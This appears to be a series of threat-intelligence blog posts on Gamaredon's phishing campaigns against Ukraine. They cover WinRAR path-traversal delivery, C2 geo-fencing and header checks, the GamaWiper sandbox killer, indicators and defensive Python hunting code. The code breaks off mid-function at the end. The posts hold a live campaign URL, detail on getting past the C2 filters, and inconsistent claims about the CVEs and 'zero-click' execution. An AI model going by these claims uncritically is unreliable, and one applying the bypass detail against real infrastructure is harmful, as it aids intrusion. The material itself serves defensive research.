After my recent blog posts covering Gamaredon’s ongoing PterodoGraph campaign targeting Ukraine, and following almost a full month of silence in terms of newly observed malware samples, fresh activity has finally resurfaced.
New samples have appeared, along with reports pointing to a component now referred to as GamaWiper.
It is important to note that GamaWiper, or at least very similar scripts, has already been observed in Gamaredon operations in previous months. From a purely technical standpoint, this functionality is therefore not entirely new.
What is new, however, is the context in which it is now being deployed.
In this article, I aim to shed some light on what GamaWiper actually is, why Gamaredon is actively delivering it at this stage of the infection chain, and what this shift tells us about the group’s current operational mindset. What initially appears to be just another destructive payload instead turns out to be a deliberate control mechanism, one that decides who receives the real malware and who gets wiped instead.
I’ll keep this post a bit shorter and focus only on what’s new, so it doesn’t get boring. If you’re looking for deeper technical details, please refer to my previous posts from 22.11.2025 and 13.11.2025, where I covered the core mechanics in depth.
For this analysis, I’m using my deobfuscated version of the sample; next time I may show you how to deobfuscate Gamaredon scripts manually in less than 10 minutes.
After downloading the latest Gamaredon malware sample, it immediately became obvious that the current variants differ noticeably from what we’ve seen before.
Note: I started writing YARA rules for Gamaredon’s current samples; you can find them here.
Key Changes at a Glance
Junk URLs now closely resemble real payload delivery URLs
No full Pterodo payload is delivered anymore 🙁
Gamaredon has hardened the delivery of Pterodo samples
Infection Flow – What Changed?
After the user opens the RAR archive and infects their system, the behavior initially looks familiar. On reboot, the Pterodo sample is fetched again, but only if the client is geolocated in Ukraine, as already mentioned in my previous blog posts.
Previously, non-UA clients would simply receive:
an empty page, or
an empty file
Today, however, things look a bit different.
Instead, the client receives GamaWiper.
GamaWiper – Sandbox? Gone.
GamaWiper is essentially a sandbox / VM killer whose sole purpose is to prevent analysis environments from seeing anything useful.
In earlier campaigns, this wasn’t always handled very well. For example, when I used Hybrid-Analysis, it was trivial to extract:
Telegram channels
Graph URLs
infrastructure relationships
This was a classic infrastructure design flaw and a great example of what budget cuts can do to an APT operation 😄
Today, however, the approach is much simpler:
If a sandbox is detected -> wipe it
No telemetry, no infrastructure leaks, no fun.
If you are doing legitimate malware research and are interested in (deobfuscated) samples from Gamaredon, you can write me an email.
Initial Loader: “GamaLoad”
The initial loader, which I’ll refer to as GamaLoad, implements a multi-stage payload fetch mechanism with dynamically constructed URLs and headers. The goal is resilience: fetch stage two no matter what.
Note: All malicious domains have been removed.
Request Characteristics
Request Type
Method: GET
Client: msxml2.xmlhttp
Execution: synchronous
URL Structure
Each request fetches a randomly generated resource:
/<random>.<ext>
Random filename: 7-10 characters (a-z, 0-9)
Camouflage extensions, e.g.:
wmv
yuv
lgc
rm
jpeg
C2 Fallback Order
The script iterates through multiple sources until a valid payload is received:
Argument URL (if passed at execution)
Hardcoded fallback
Cloudflare Workers domain
Domain fetch using @ notation
Abuse of the URL userinfo field
Dynamic host via check-host.net
HTML parsing
live host extraction
Alternative domain (again using @ notation)
Registry-based URL
Once a working C2 is found, it is stored as a persistent C2 entry.
HTTP Headers
The request uses very explicit and intentionally crafted headers.
User-Agent
A browser-like string combined with a host fingerprint, including:
Computer name
Drive serial number (hex-encoded)
Timestamp
UTC+2
Ukrainian local time expected
Cookie
Static campaign identifier
Rotates regularly (more on that below)
Content-Length
Explicitly set
Even for GET requests
Enables victim identification & tracking
Also plays a role in proxy evasion (see below)
Success Condition
A request is considered successful when:
HTTP status is 200
Response size is greater than 91 bytes
Once this condition is met, all remaining fallbacks are skipped.
Payload Processing
Payload received as binary
UTF-8 conversion
Cleanup (CR/LF, delimiters)
Base64 decoding
In-memory execution
No disk writes – classic fileless execution
Evasion Techniques
Multi-stage fallback logic
Dynamic hosts
Delays between requests
Victim-specific User-Agent
Below is an example of a fully constructed request header sent to the payload delivery host.
Payload Rotation
Gamaredon currently rotates payloads every 1-3 hours.
With each rotation, the following variables may change:
Domains for Payload Delivery
User-Agent
Cookie
Content-Length
Why Is Content-Length Set?
The Content-Length HTTP header specifies the size of the request or response body in bytes. Its typical purpose is:
Defining message boundaries
Preventing truncated reads
Enabling correct stream handling
In this case, however, I strongly believe the header is set intentionally for tracking and proxy evasion.
Why?
The loader uses msxml2.xmlhttp. When calling .send() via this client, the Content-Length header is not overwritten.
For a normal residential client, this is usually not an issue. However, many HTTP/HTTPS proxies, especially residential and chained proxies, fail to handle this properly and may:
break the connection
modify the request
normalize headers
This behavior is highly detectable.
My conclusion: Gamaredon likely uses this mechanism to filter out proxy-based analysis setups. The choice of client and header behavior is far too specific to be accidental.
So, if you end up receiving GamaWiper instead of a payload, now you know why.
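As an added example (constructed here, not the post’s own code), the following Python hunt runs over JSON-lines proxy records and scores the GamaLoad request traits described above: the random camouflage filename, a Content-Length header on a GET, a browser-like User-Agent carrying a host fingerprint, the “@” userinfo decoy from the fallback list, and a script host as the requesting process; each flagged response is then judged against the loader’s own 200-status / 91-byte success condition. The log lines, the placeholder hosts and the rendering of the drive serial as 8 hex digits inside the User-Agent are assumptions.

```python
import json
import re
from urllib.parse import urlsplit

# Constructed proxy/EDR export (JSON lines), NOT real telemetry: one web request
# per line with the originating process, request headers and the response seen.
# Hosts are placeholders; the last line mimics the "decoy@real-host" URL shape.
SAMPLE_LOG = """
{"process": "chrome.exe", "method": "GET", "url": "https://example.org/index.html", "headers": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"}, "status": 200, "resp_bytes": 18231}
{"process": "mshta.exe", "method": "GET", "url": "http://c2-placeholder.invalid/k3x9p2qa.wmv", "headers": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36;DESKTOP-7Q2K1;A1B2C3D4;20251122143015", "Cookie": "id=CAMPAIGN-PLACEHOLDER", "Content-Length": "0"}, "status": 200, "resp_bytes": 0}
{"process": "mshta.exe", "method": "GET", "url": "http://c2-placeholder.invalid/zq81mw7e.yuv", "headers": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36;DESKTOP-7Q2K1;A1B2C3D4;20251122150102", "Cookie": "id=CAMPAIGN-PLACEHOLDER", "Content-Length": "0"}, "status": 200, "resp_bytes": 5120}
{"process": "mshta.exe", "method": "GET", "url": "http://decoy.example.gov.ua@dyndns-placeholder.invalid/", "headers": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"}, "status": 200, "resp_bytes": 0}
"""

# Camouflage resource names from the post: 7-10 chars of [a-z0-9] plus a media-looking extension.
CAMOUFLAGE_PATH = re.compile(r"^/[a-z0-9]{7,10}\.(?:wmv|yuv|lgc|rm|jpeg)$")
# Assumption: the drive serial is rendered as 8 hex digits (a Windows volume serial is 32-bit).
# The lookbehind excludes '/' and '.' so version tokens like "Gecko/20100101" do not match.
HEX_TOKEN = re.compile(r"(?<![0-9A-Za-z/.])[0-9A-Fa-f]{8}(?![0-9A-Za-z])")
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}


def decoy_userinfo(url):
    """Return (userinfo, real host) when the URL uses the '@' trick from the
    fallback list: a domain-looking userinfo in front of the real host."""
    parts = urlsplit(url)
    if parts.username and "." in parts.username:
        return parts.username, parts.hostname
    return None


def score_request(rec):
    """Collect the request-side traits of the loader present in one record."""
    hits = []
    headers = {k.lower(): v for k, v in rec.get("headers", {}).items()}
    url = rec.get("url", "")
    if CAMOUFLAGE_PATH.match(urlsplit(url).path):
        hits.append("camouflage-url")
    if rec.get("method") == "GET" and "content-length" in headers:
        hits.append("content-length-on-get")
    ua = headers.get("user-agent", "")
    if ua.startswith("Mozilla/") and HEX_TOKEN.search(ua):
        hits.append("fingerprinted-ua")
    if decoy_userinfo(url):
        hits.append("decoy-userinfo")
    if rec.get("process", "").lower() in SCRIPT_HOSTS:
        hits.append("script-host-client")
    return hits


def classify_response(rec):
    """Mirror the loader's success condition: HTTP 200 and a body larger than
    91 bytes is 'accepted'; anything else is the filtered (empty) answer."""
    if rec.get("status") == 200 and rec.get("resp_bytes", 0) > 91:
        return "accepted"
    return "rejected"


def hunt(text, threshold=2):
    """Score every JSON-lines record and report those with >= threshold hits."""
    findings = []
    for n, line in enumerate(text.strip().splitlines(), 1):
        rec = json.loads(line)
        hits = score_request(rec)
        if len(hits) >= threshold:
            findings.append({
                "line": n,
                "host": urlsplit(rec["url"]).hostname,
                "hits": hits,
                "response": classify_response(rec),
            })
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"line {f['line']}: {f['host']} {f['response']} {', '.join(f['hits'])}")
```

A flagged request whose response is “rejected” is exactly the case the post describes: the host looked wrong to the C2 and got the empty answer (or GamaWiper) instead of Pterodo.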
Conclusion
Gamaredon has clearly tightened its operational security.
The infrastructure flaws that previously allowed easy extraction of internal details have been addressed, and sandbox detection has shifted from “leaky but useful” to “wipe and move on”.
While these changes will certainly disrupt some tracking and automated analysis systems, the overall approach feels… let’s say pragmatic, but somewhat heavy-handed.
UPDATE 22.12.2025: Gamaredon updated its payload delivery infrastructure. You can find more information here.
UPDATE 08.01.2026: If you want to know how to defend against Gamaredon and similar actors, check out this article. I also started writing YARA rules for Gamaredon’s current samples; if you are a legitimate security researcher and need them, send me an email. If you are doing legitimate malware research and are interested in (deobfuscated) samples from Gamaredon, you can write me an email as well.
New C2 architecture: DynDNS + Fast-Flux + Telegram + graph.org
Two-stage geo-fencing + header firewall
Pteranodon as the central Stage-2 loader
Server-side registration required for deeper payload access
As the year slowly crawls toward its inevitable end (like certain Russian infrastructure), it’s a good moment to take another detailed look at Gamaredon’s ongoing phishing campaign targeting Ukraine.
I’ve previously published a high-level overview of this campaign; check that article out if you want the “lite” version. Today, however, we’re digging deeper: how to untangle the FSB’s infrastructure for this operation and how we managed to extract additional payloads directly from their servers, with varying degrees of cooperation from Microsoft’s RAR parser.
A quick thank-you goes out to my brother Ramon, who assisted especially in retrieving additional payloads from Gamaredon’s backend. Family bonding through state-sponsored malware analysis, truly heartwarming.
Dataset Overview
For this analysis, I organized all samples into a structured table divided into Stage-1 and Stage-2 to Stage-X artifacts.
Stage-1 samples are the actual phishing attachments delivered to victims (HTA, LNK, RAR archives).
Stage-2 to Stage-X samples represent everything the Gamaredon infrastructure subsequently downloads once the initial loader executes or the vulnerability is triggered.
Each entry contains:
Filename: original name taken from the email attachment or payload
Hash: SHA-256 fingerprint for verification
Dropped Files: anything extracted or written by the sample (HTA/PS1 loaders, Pteranodon modules, persistence scripts, etc.)
This allows us to map the infection chain fully, from the very first email to the deeper payload ecosystem sitting behind Gamaredon’s firewall-like C2 logic.
In total, we analyzed 37 samples for this write-up.
Filename | Dropped Files
Передати засобами АСУ Дніпро_6_3_4_4265_17.11.2025.pdf | Передати засобами АСУ Дніпро6_3_4_4265_17.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_6_3_4_4265_17.11.2025.HTA
Передати засобами АСУ Дніпро_9_5_5_433_17.11.2025.pdf | Передати засобами АСУ Дніпро9_5_5_433_17.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_9_5_5_433_17.11.2025.HTA
Передати засобами АСУ Дніпро_2_7_4_62_13.11.2025.pdf | Передати засобами АСУ Дніпро2_7_4_62_13.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_7_4_62_13.11.2025.HTA
Передати засобами АСУ Дніпро_3_8_2_7442_13.11.2025.pdf | Передати засобами АСУ Дніпро3_8_2_7442_13.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_3_8_2_7442_13.11.2025.HTA
Передати засобами АСУ Дніпро_2_1_1_7755_12.11.2025.pdf | Передати засобами АСУ Дніпро2_1_1_7755_12.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_1_1_7755_12.11.2025.HTA
Передати засобами АСУ Дніпро_2_1_1_7755_11.11.2025.pdf | Передати засобами АСУ Дніпро2_1_1_7755_11.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_1_1_7755_11.11.2025.HTA
Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf | Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf:.........._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_11-967_11.11.2025.HTA
Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf | Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf:.........._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_11-967_10.11.2025.HTA
Перегляд підходів до призову під час мобілізації_2-3716-25_07.11.2025.pdf | Перегляд підходів до призову під час мобілізації2-3716-25_07.11.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2-3716-25_07.11.2025.HTA
The analyzed artifacts make the intention behind this operation painfully clear: the campaign is aimed squarely at Ukrainian military, governmental, political, and administrative entities.
Based on filenames, document themes, and sender infrastructure, Gamaredon’s operational goals can be summarized as follows:
Military intelligence collection (documents, internal communication, location data, organization charts)
Rapid exfiltration (Pteranodon immediately sends host-, user-, and system-metadata to the C2)
Long-term espionage (stealers, wipers, tasking modules, USB spreaders)
This is not an opportunistic campaign. It is a structured, military-oriented espionage and sabotage operation consistent with, and likely coordinated by, Russian state intelligence.
Campaign Timeline
Campaign Description
Gamaredon continues to bombard Ukrainian organizations with phishing emails, using a rotating set of attachments and themes. The filenames of the analyzed samples strongly indicate military and political targeting, and the underlying infrastructure is built on large DynDNS farms and Fast-Flux C2 nodes, an architecture that screams “FSB budget optimization,” if you will.
Until early November 2025, the group primarily distributed HTA and LNK attachments. Then they shifted strategy, adopting a new Windows vulnerability, CVE-2025-6218, which allows infections without the victim consciously executing anything.
Their new favorite delivery vector? RAR archives containing seemingly harmless documents.
What happens?
When a victim opens the RAR archive:
the vulnerability triggers immediately
a hidden HTA is extracted straight into the Windows Startup folder
reboot -> automatic execution -> connection to Gamaredon’s C2
further payloads are downloaded and initial reconnaissance begins
A classic example of Microsoft doing Microsoft things.
Infection Chain (CVE-2025-6218 & CVE-2025-8088)
The multi-stage infection chain used in this campaign is simple, elegant, and annoyingly effective. A key component is the server-side access control logic, which tightly restricts who is allowed to receive further payloads, ensuring that analysts outside the target region receive nothing but empty responses and existential frustration.
1. Initial Access: Web-based Loaders
Entry points include:
HTA attachments
LNK droppers
RAR archives containing HTA or LNK files
And increasingly:
RAR archives exploiting CVE-2025-6218 and CVE-2025-8088
CVE-2025-6218
Vulnerability allowing automatic file extraction into privileged directories
HTA placed into Startup without user execution
CVE-2025-8088
MSHTML execution bypass, circumventing Windows 11 hardening
All these delivery formats share one purpose: download and launch Pteranodon, the central stage-2 loader.
2. Pteranodon Loader
Once the initial dropper executes, it fetches Pteranodon via HTTP(S).
This is where Gamaredon’s C2 firewall kicks in.
Persistence Mechanisms
Pteranodon uses multiple persistence vectors depending on available permissions:
Registry Run keys (HKCU and occasionally HKLM)
Scheduled tasks (5 – 30 minute intervals)
HTA files in the Startup folder
Hidden script copies inside %APPDATA%, %LOCALAPPDATA%, and %PROGRAMDATA%
These ensure the loader survives multiple reboots and can continuously request new tasks and modules.
Communication Structure
Gamaredon’s C2 traffic is distinctive:
XOR + Base64 layering
Pseudo-JSON structures (loose key/value pairs)
Regular tasking requests (download payload, run wiper, USB spread, resend systeminfo)
Operator fingerprints (recurring variable names and patterns)
Pteranodon is intentionally simple, lightweight, and extremely flexible, the malware equivalent of a Russian Lada: it may look primitive, but you’ll be surprised how long it keeps going.
3. Access Control Logic (C2 Firewall)
Gamaredon uses a multi-layered filtering system that serves as both OPSEC and anti-analysis defense.
Purpose of the Access Control Logic
The C2:
only responds fully to Ukrainian IP ranges
verifies browser headers
requires system registration before delivering deeper payloads
This effectively locks out researchers, sandboxes, cloud instances, and… pretty much everyone except the intended victims.
Stages
Stage 1: IP Validation
Non-Ukrainian IP -> HTTP 200 with empty body
Ukrainian IP -> proceed
Stage 2: Header Validation
Must supply correct:
Identifier/Token
User-Agent
Accept-Language
Invalid -> serve a 0-byte file
Valid -> proceed
Stage 3: Registration & Tasking
Full payload access only after system registration:
hostname
username
local IP
environment
token
Then the C2 provides:
USB/network spread modules
Wipers
Persistence modules
Stealers
Additional droppers
The basic access control logic looks like this:
4. Campaign Characteristics
Strict Ukraine-only geo-fencing
Strong anti-analysis (empty responses instead of errors)
High variation of initial access files
Consistent use of Pteranodon
Increased abuse of RAR + CVE-2025-6218
Multiple drops per day
Analysis
This article focuses more on mapping the infrastructure than on deep reverse-engineering. If you want in-depth Stage-1 payload analysis, check my previous article.
Once the malicious attachment is executed, it contacts a remote Gamaredon domain and retrieves Pteranodon.
Key observations from sandboxing
Most sandbox environments receive empty responses, expected due to the C2 filtering
Simulating headers alone is insufficient
Regular Ukrainian proxies also fail
Rotating Ukrainian residential proxies do work
However, deeper stages require successful registration, which makes automated extraction time-consuming
After bypassing the filters, we obtained obfuscated HTAs containing Base64-encoded VBS code.
These loaders then fetch:
Pteranodon
wiper modules
auxiliary droppers
etc.
All files are provided in the sample table for further analysis.
Telegram & graph.org C2 Distribution
Gamaredon uses:
Telegram channels for rotating C2 IPs and cryptographic material
graph.org pages for rotating payload URLs
Both platforms are:
ideal for operations requiring frequent updates
highly resilient
hard to take down
https://graph.org/vryivzphxwc-11-11
If you are doing legitimate malware research and are interested in tracking, feel free to write me an email.
Fast-Flux Infrastructure (194.67.71.0/24)
One IP stood out: 194.67.71.75, belonging to REG.RU, a well-known high-abuse Russian hosting provider.
Findings:
200+ IPs in the subnet engaged in coordinated port-scanning against Ukrainian targets (April 2025)
44,157 PassiveDNS entries for the 256 hosts
39,903 unique domains
Typical Fast-Flux characteristics:
extremely short TTL
rapid IP rotation
each IP hosting dozens of unrelated domains
low-quality disposable domain patterns
consistent abusive behavior
This subnet is:
clearly Russian-controlled
used for offensive operations
structurally similar to GRU-affiliated infrastructure
highly likely to be connected directly or indirectly to the FSB
I built a graph on VirusTotal to visualize the malware distribution by the subnet:
Changes in the 2025 Gamaredon Campaign
Compared to 2021 – 2024, the 2025 operation shows significant evolution:
1. Zero-Click via CVE-2025-6218
RAR-based exploit allows silent execution with no user interaction.
2. RAR-First Delivery
RAR replaced HTA/LNK as the primary attachment format.
3. More complex access control
Geo-fencing, header checks, registration tokens, and multi-stage filtering.
Better registry/task persistence and more aggressive lateral movement.
Summary
The 2025 Gamaredon campaign is no longer just “phishing with extra steps”. It has evolved into a modular, highly dynamic, multi-infrastructure malware ecosystem, powered by:
Zero-click exploits
Geo-fenced C2 delivery
Fast-Flux DNS
Telegram distribution
graph.org rotation
Persistent Pteranodon loaders
…all wrapped in a design philosophy best described as: “If it works, ship it, if it breaks, wrap it in Base64 and ship it anyway.”
MITRE ATT&CK Mapping
The current Gamaredon campaign maps to a wide range of relevant MITRE ATT&CK techniques. Below is a consolidated overview of the most important tactics and techniques observed during the various stages of the operation:
TA0001 – Initial Access
T1566.001 – Phishing: Spearphishing Attachment
Distribution of HTA, LNK, and RAR attachments using thematically relevant document names.
T1204.002 – User Execution: Malicious File
Execution of HTA/LNK loaders, or automatic execution via CVE-2025-6218.
TA0002 – Execution
T1059.005 – Command and Scripting Interpreter: Visual Basic
Extensive use of HTA and VBScript for initial loader execution.
T1059.001 – Command and Scripting Interpreter: PowerShell
Used to download and run Pteranodon modules.
T1203 – Exploitation for Client Execution
CVE-2025-6218 enabling automatic HTA placement and execution (zero-click).
TA0003 – Persistence
T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Persistence achieved via HTA scripts placed in the Startup folder and registry autostarts.
T1053.005 – Scheduled Task/Job
Creation of scheduled tasks that periodically re-execute Pteranodon or supplemental scripts.
TA0004 – Privilege Escalation
(No explicit privilege escalation techniques observed; Gamaredon typically operates under user-level permissions.)
TA0005 – Defense Evasion
T1027 – Obfuscated/Encrypted Files and Information
Heavy use of Base64 and XOR layers to obfuscate code and communications.
T1497 – Virtualization/Sandbox Evasion
C2 access control (IP/header validation) to prevent payload delivery to researchers or sandboxes.
T1070 – Indicator Removal on Host
Wiper/cleanup scripts remove MRUs, registry traces, and startup entries.
TA0006 – Credential Access
(Seen in earlier Gamaredon campaigns; less prominent in 2025.)
T1552.001 – Unsecured Credentials: Credentials in Files
Some modules harvest document contents and autocomplete data.
TA0010 – Exfiltration
T1041 – Exfiltration Over C2 Channel
Hostnames, usernames, system metadata, and environment details sent directly to C2.
TA0011 – Command and Control
T1071.001 – Application Layer Protocol: Web Protocols
C2 communication over HTTP/HTTPS.
T1102.002 – Web Service: Telegram
Use of Telegram channels for dynamic IP rotation and distribution of secrets/tokens.
T1102 – Web Service (graph.org)
Use of graph.org pages for periodically rotating payload URLs.
T1568.002 – Dynamic DNS
Frequent use of DynDNS for rotating C2 domains.
T1090 – Proxy
Fast-Flux infrastructure in subnet 194.67.71.0/24 used to proxy malicious infrastructure.
TA0009 – Collection
T1119 – Automated Collection
Immediate collection of system information after Pteranodon’s initial registration.
TA0008 – Lateral Movement / Propagation
T1091 – Replication Through Removable Media
USB-based propagation (a long-standing Gamaredon tactic).
T1021 – Remote Services (limited)
Some modules show capability for internal network spread.
High-Level Indicators for Threat Hunters
This section summarizes the most important behavioral indicators that SOCs, threat hunters, and CERT teams can use to detect Gamaredon activity early. These are high-level detection patterns rather than sample-specific IOCs.
1. Network Indicators
HTTP requests from mshta.exe or powershell.exe to DynDNS domains, graph.org pages, or Ukrainian/Russian subnets
Repeated GET requests resulting in 0-byte responses
Outbound traffic to 194.67.71.0/24 (REG.RU Fast-Flux cluster)
Unexpected connections to Telegram API/channels without active user sessions
Very low DNS TTL values for domains rotating across many IPs
2. File System Indicators
Presence of suspicious script files:
HTA/VBS in the Startup folder: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\*.hta
Dropped PowerShell/VBS files in:
%APPDATA%
%LOCALAPPDATA%
%PROGRAMDATA%
Files with pseudo-legitimate names such as Update.hta, Sync.hta, etc.
How a Russian Threat Actor Uses a Recent WinRAR Vulnerability in Their Ukraine Operations
Today we’re taking a look at several malware samples from the advanced persistent threat group “Primitive Bear” aka “Gamaredon”.
Primitive Bear is a Russian state-sponsored Advanced Persistent Threat (APT) group that has been active since at least 2013. With high confidence, the group is attributed to the Federal Security Service of the Russian Federation (FSB), Russia’s domestic intelligence service.
The most recently circulating malware samples caught my attention because they all follow the same pattern and exploit a newly disclosed vulnerability, CVE-2025-6218, to load additional malware in later stages.
In this post, I want to walk you through the methodology and the infrastructure used by the attacker.
Below is an overview of the samples I analyzed that make use of CVE-2025-6218, along with their origin. I will continue analyzing additional samples in order to map the attacker’s infrastructure as comprehensively as possible.
Повістка про виклик_357-16230-25_24.10.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_357-16230-25_24.10.2025.HTA
Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_11-967_11.11.2025.HTA
Перегляд підходів до призову під час мобілізації_2-3716-25_07.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2-3716-25_07.11.2025.HTA
Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_11-967_10.11.2025.HTA
Передати засобами АСУ Дніпро_2_1_1_7755_11.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_1_1_7755_11.11.2025.HTA
Передати засобами АСУ Дніпро_2_1_1_7755_12.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_1_1_7755_12.11.2025.HTA
Передати засобами АСУ Дніпро_3_8_2_7442_13.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_3_8_2_7442_13.11.2025.HTA
Передати засобами АСУ Дніпро_2_7_4_62_13.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_7_4_62_13.11.2025.HTA
The campaign I observed clearly targets Ukrainian entities, something we can identify mainly by the filenames used:
Original Filename | English Translation
Повістка про виклик_357-16230-25_24.10.2025.pdf | Subpoena_357-16230-25_24.10.2025.pdf
Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf | Regarding the provision of information (military unit A0135_11-967_11.11.2025).pdf
Перегляд підходів до призову під час мобілізації_2-3716-25_07.11.2025.pdf | Review of approaches to conscription during mobilisation_2-3716-25_07.11.2025.pdf
Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf | Request for information from the commander of military unit A0135_11-967_10.11.2025.pdf
Передати засобами АСУ Дніпро_2_1_1_7755_11.11.2025.pdf | Transfer via automated control system Dnipro_2_1_1_7755_11.11.2025.pdf
Передати засобами АСУ Дніпро_2_1_1_7755_12.11.2025.pdf | Transfer via automated control system Dnipro_2_1_1_7755_12.11.2025.pdf
Передати засобами АСУ Дніпро_3_8_2_7442_13.11.2025.pdf | Transfer via automated control system Dnipro_3_8_2_7442_13.11.2025.pdf
Передати засобами АСУ Дніпро_2_7_4_62_13.11.2025.pdf | Transfer via automated control system Dnipro_2_7_4_62_13.11.2025.pdf
Primitive Bear is well-known for its spear-phishing operations, so none of this is surprising. What is new, however, is the use of RAR archives to load additional malware. Unfortunately, we cannot definitively identify all recipients of these samples, but the filenames give us a pretty good idea of who they were intended for:
File | Probable recipient / Context | Derived from the name
Повістка про виклик_357-16230-25_24.10.2025.pdf | Authorities/judiciary or territorial recruitment centers (ТЦК та СП) for mobilization | “Повістка” can mean court/investigative authority or military summons.
Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf | Military Unit A0135 (Військова частина А0135) | explicit mention of the unit
Перегляд підходів до призову під час мобілізації_2-3716-25_07.11.2025.pdf | Mobilization/personnel offices: ТЦК та СП, Mobilization Department in the MoD/General Staff | Thematic focus: “Approaches to convening”
Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf | Commander of military unit A0135 | explicitly addressed
Передати засобами АСУ Дніпро_2_1_1_7755_11.11.2025.pdf | Positions with access to “АСУ Днепр” (АСУ = Automated Management/Information Systems); this is typically MoD/ТЦК/Human Resources | “Transmit via ASU Dnipro” -> internal administration/data channel
Передати засобами АСУ Дніпро_2_1_1_7755_12.11.2025.pdf | as above | Series/sequel document (different date)
Передати засобами АСУ Дніпро_3_8_2_7442_13.11.2025.pdf | as above | other internal classification/filing codes
Передати засобами АСУ Дніпро_2_7_4_62_13.11.2025.pdf | as above |
Now that we better understand the context of the samples, we can dive into the actual analysis. Since all samples share a nearly identical structure, we’ll look at the most recent one found, with the hash 237696ecc370688a8d1894eb2f95af53a3c0f8d42eb540b7f529b4d4f4492bc0.
The victim receives a RAR archive containing two files: a fake PDF and an HTML Application (HTA). The HTA file always has the same bizarre naming scheme:
This immediately reveals the exploitation of CVE-2025-6218.
The vulnerability is a critical directory traversal -> remote code execution (RCE) flaw in WinRAR (up to version 7.11) on Windows. The bug lies in how RAR archives process file paths: an attacker can craft an archive entry that writes files outside the intended extraction folder, e.g. directly into the user’s Startup directory.
Once a file lands in an auto-executed location, it runs on next login or reboot, resulting in RCE with the current user’s privileges. It still requires user interaction, such as opening a malicious archive. The issue is fixed in WinRAR 7.12 (Beta 1) and later.
If you want to get a feeling for the vulnerability, a PoC is definitely worth looking at.
So what actually happens when the victim opens the RAR file?
The user opens the archive.
The archive extracts a .pdf into the current directory.
The archive silently extracts an .hta containing obfuscated VBScript into the Startup folder.
After reboot, the VBScript fetches additional malware.
It’s worth noting that the exploitation of CVE-2025-6218 requires only minimal user interaction. In most cases, the victim merely has to open the malicious RAR archive. No special system configuration is required, no sandbox needs to be disabled, and no “advanced mode” must be enabled. WinRAR’s default extraction behavior is sufficient for the path traversal to write an HTA file directly into the user’s Startup folder.
Long story short: the attacker relies only on the victim doing what victims do best, double-clicking whatever lands in their inbox.
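As an added example (not from the post or from WinRAR), here is the check a defender can run over an archive’s entry listing to catch the traversal pattern described above: resolve each entry name the way an unprotected extractor would and report whether it escapes the extraction directory and, specifically, whether it lands in the per-user Startup folder with an auto-run extension. The extraction directory, the listing and the file names are constructed; the entry names come from whatever RAR parser you already use.

```python
import ntpath

# Constructed extraction directory on a victim host (assumption for the example).
DEST_DIR = r"C:\Users\victim\Downloads\mail"
# Startup folder suffix, lower-cased with backslashes (the form ntpath.normcase yields).
STARTUP_MARKER = r"\microsoft\windows\start menu\programs\startup\""[:-1]
AUTORUN_EXT = (".hta", ".vbs", ".vbe", ".js", ".lnk", ".ps1", ".cmd", ".bat", ".exe")


def resolve_entry(name, dest=DEST_DIR):
    """Absolute Windows path an entry would be written to by an extractor
    that applies no traversal protection (the CVE-2025-6218 situation)."""
    name = name.replace("/", "\\")            # RAR entries may use either separator
    if ntpath.isabs(name) or ntpath.splitdrive(name)[0]:
        target = name                         # absolute or drive-qualified entry
    else:
        target = ntpath.join(dest, name)
    # normpath collapses '..' components, including ones that climb past the root
    return ntpath.normpath(target)


def classify_entry(name, dest=DEST_DIR):
    """'ok' if the entry stays under dest, 'startup' if it escapes into the
    user's Startup folder with an auto-run extension, else 'traversal'."""
    target = ntpath.normcase(resolve_entry(name, dest))
    root = ntpath.normcase(ntpath.normpath(dest)) + "\\"
    if target.startswith(root):
        return "ok"
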